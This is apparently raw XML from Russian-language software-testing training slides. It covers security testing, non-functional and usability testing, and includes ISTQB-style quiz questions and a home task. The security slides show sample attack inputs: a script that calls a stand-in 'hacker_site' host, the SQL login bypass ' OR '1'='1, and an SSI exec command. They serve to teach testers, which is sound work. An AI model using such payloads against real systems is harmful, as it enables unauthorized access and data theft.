              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>src=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>"http://hacker_site/?command"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> объект </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Image</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Image</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>(); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>foo.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> = "http://hacker_site/?command"; &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>injections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> (SQL, PHP, ASP и т.д.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Вставки исполняемого кода рассмотрим на примере кода SQL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Форма входа в систему имеет 2 поля - имя и пароль. Обработка происходит в базе данных через выполнение SQL запроса:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>' AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>testpass';Вводим</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> корректное имя ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>’, а в поле пароль вводим строку:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>testpass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>' OR '1'='1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>В итоге, Если поле не имеет соответствующих </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>валидаций</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> или обработчиков данных, может вскрыться уязвимость, позволяющая зайти в защищенную паролем систему, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>т.к.SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> запрос примет следующий вид:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>' AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>testpass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>' OR '1'='1';Условие '1'='1' всегда будет истинным и поэтому SQL запрос всегда будет возвращать много значений.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Server-Side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Includes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> (SSI) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>В зависимости от типа операционной системы команды могут быть разными, как пример рассмотрим команду, которая выводит на экран список файлов в OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&lt; !--#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>" --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Bypass</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Пользователь А может получить доступ к документам пользователя Б. Допустим, есть реализация, где при просмотре своего профиля, содержащего </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>конфеденциальную</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> информацию, в URL страницы передается </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>userID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>, а данном случае есть смысл попробовать подставить вместо своего </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>userID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> номер другого пользователя. И если вы увидите его данные, значит вы нашли дефект.</a:t>
            </a:r>
          </a:p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B0C5A-EE92-4E92-8F5B-10699705BBE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Нефункциональное тестирование включает, но не ограничивается, нагрузочное тестирование, тестирование производительности, стресс-тестирование, тестирование удобства использования, тестирование восстановления, тестирование надежности и тестирование переносимости. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Это тестирование того, «как» система работает. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Нефункциональное тестирование может выполняться на всех уровнях тестирования. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Термин нефункциональное тестирование описывает тесты, необходимые для оценки характеристик систем и программ, которые могут быть количественно измерены, такие как время отклика при тестировании производительности. Эти тесты могут ссылаться на модели качества, такие как «Разработка программного обеспечения – Качество программного продукта» (ISO 9126). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Нефункциональное тестирование рассматривает внешнее поведение программного обеспечения и в большинстве случаев использует разработку тестов методом черного ящика. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Нагрузочное</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> тестирование (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>load testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>) – вид тестирование производительности, проводимый с целью оценить поведение компонента или системы под увеличивающейся нагрузкой (число одновременно работающих пользователей </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>и\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> или число транзакций) для определения максимально допустимого уровня нагрузки для исследуемого компонента или системы.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Тестирование производительности (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>performance testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>– процесс тестирования с целью определить производительность программного продукта. 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Стресс тестирование (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>stress testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> - вид тестирования производительности, оценивающий систему или компонент на различных граничных значениях рабочих нагрузок или за их пределами, или же в состоянии ограниченных ресурсов, таких как память или доступ к серверу.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Тестирование удобства использования (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>usability testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>) - это метод тестирования, направленный на установление степени удобства использования, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>обучаемости</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>, понятности и привлекательности для пользователей разрабатываемого продукта в контексте заданных условий.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Тестирование удобства пользования дает оценку уровня удобства использования приложения по следующим пунктам:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>производительность, эффективность</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>efficiency</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>) - сколько времени и шагов понадобится пользователю для завершения основных задач приложения, например, размещение новости, регистрации, покупка и т.д.? (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
              <a:t>меньше - лучше</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>правильность</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>accuracy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>) - сколько ошибок сделал пользователь во время работы с приложением? (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
              <a:t>меньше - лучше</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>активизация в памяти</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>recall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>) – как много пользователь помнит о работе приложения после приостановки работы с ним на длительный период времени? (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
              <a:t>повторное выполнение операций после перерыва должно проходить быстрее чем у нового пользователя</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>эмоциональная реакция</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>emotional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>) – как пользователь себя чувствует после завершения задачи - растерян, испытал стресс? Порекомендует ли пользователь систему своим друзьям? (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
              <a:t>положительная реакция - лучше</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU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B0C5A-EE92-4E92-8F5B-10699705BBE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ru.wikipedia.org/wiki/%D0%A1%D1%82%D1%80%D0%B0%D1%82%D0%B5%D0%B3%D0%B8%D1%8F_%D1%82%D0%B5%D1%81%D1%82%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F_%D0%BF%D0%BE_%D0%BF%D1%80%D0%B8%D0%BD%D1%86%D0%B8%D0%BF%D1%83_%C2%AB%D0%91%D0%B5%D0%BB%D0%BE%D0%B3%D0%BE_%D1%8F%D1%89%D0%B8%D0%BA%D0%B0%C2%BB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B0C5A-EE92-4E92-8F5B-10699705BBE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TEST2</a:t>
            </a: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 1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of the following statements is MOST OFTEN true?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Source-code inspections are often used in component testing.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Component testing searches for defects in programs that are separately testable.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Component testing is an important part of user acceptance testing.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Component testing aims to expose problems in the interactions between software and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components.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-----------------------------------------------------------------------------------------------------------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 2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the objective of debugging?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localize a defect.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ii To fix a defect.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iii To show value.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iv To increase the range of testing.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iii.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ii, iii, iv.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ii, iv.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ii.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-----------------------------------------------------------------------------------------------------------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Question 3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of the following is a characteristic of good testing in any life cycle model?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All document reviews involve the development team.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Some, but not all, development activities have corresponding test activities.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Each test level has test objectives specific to that level.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Analysis and design of tests begins as soon as development is complete.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-----------------------------------------------------------------------------------------------------------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Question </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>4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test a function, the programmer has to write a _________, which calls the function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tested and passes it test data.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Stub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Driver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Proxy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None of the above</a:t>
            </a:r>
          </a:p>
          <a:p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-----------------------------------------------------------------------------------------------------------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Question </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> symbol should be between 4 and 5 to have a result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>more than 4 but less than 5?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B0C5A-EE92-4E92-8F5B-10699705BBE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11-Jan-15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11-Jan-15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11-Jan-15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kinnao@ua.f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29000" y="2362200"/>
            <a:ext cx="4648200" cy="1169551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="76A9D4">
                  <a:lumMod val="0"/>
                  <a:lumOff val="100000"/>
                  <a:alpha val="0"/>
                </a:srgb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Throughout the Software Life Cycle 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66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kad\Desktop\Trainings\SoftReports\Pictures\1238776843_pic_id14985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7314" y="2442522"/>
            <a:ext cx="1581150" cy="197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533400"/>
            <a:ext cx="484530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 and Home Task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3923764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Write tests for a pen on each test level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83568" y="2996952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Answer the test questions given by the trainer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83567" y="1547500"/>
            <a:ext cx="73739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Remember the terms from the lesson:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>validation, verification, alpha testing, filed testing, component testing, integration testing, system testing, acceptance testing </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3203848" y="5229200"/>
            <a:ext cx="3960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Answers on the 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> and 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>  questions send to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>kinnao@ua.fm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean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340002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40959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Task Questions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47664" y="1628800"/>
            <a:ext cx="56886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i="1" dirty="0" smtClean="0"/>
              <a:t>What are the characteristics of good testing in any lifecycle model?</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>What is the difference between verification and validation?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>What has lower independence level: alpha or beta testing? Why do you think so?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>Which software development model “Scrum” and “Extreme Programming”  methodologies are related to?</a:t>
            </a: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329217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794493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Throughout the Software Life Cycle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82128" y="1700808"/>
            <a:ext cx="31062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Maintenance Testing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59632" y="1712098"/>
            <a:ext cx="142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Testing Types</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Flowchart: Connector 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4977189" y="1826181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971600" y="1846996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Рисунок 11" descr="сопровождение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8" y="2613645"/>
            <a:ext cx="2857500" cy="1895475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Рисунок 14" descr="тесты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2797" y="2320088"/>
            <a:ext cx="2324888" cy="240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0775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25943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1437" y="1712098"/>
            <a:ext cx="7416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test type is focused on a particular test objective, which could be any of the following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" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="958767" y="2564904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224136" y="242088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function to be performed by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>software</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="3032140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224136" y="2915652"/>
            <a:ext cx="5652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non-functional quality characteristic, such as reliability or usability </a:t>
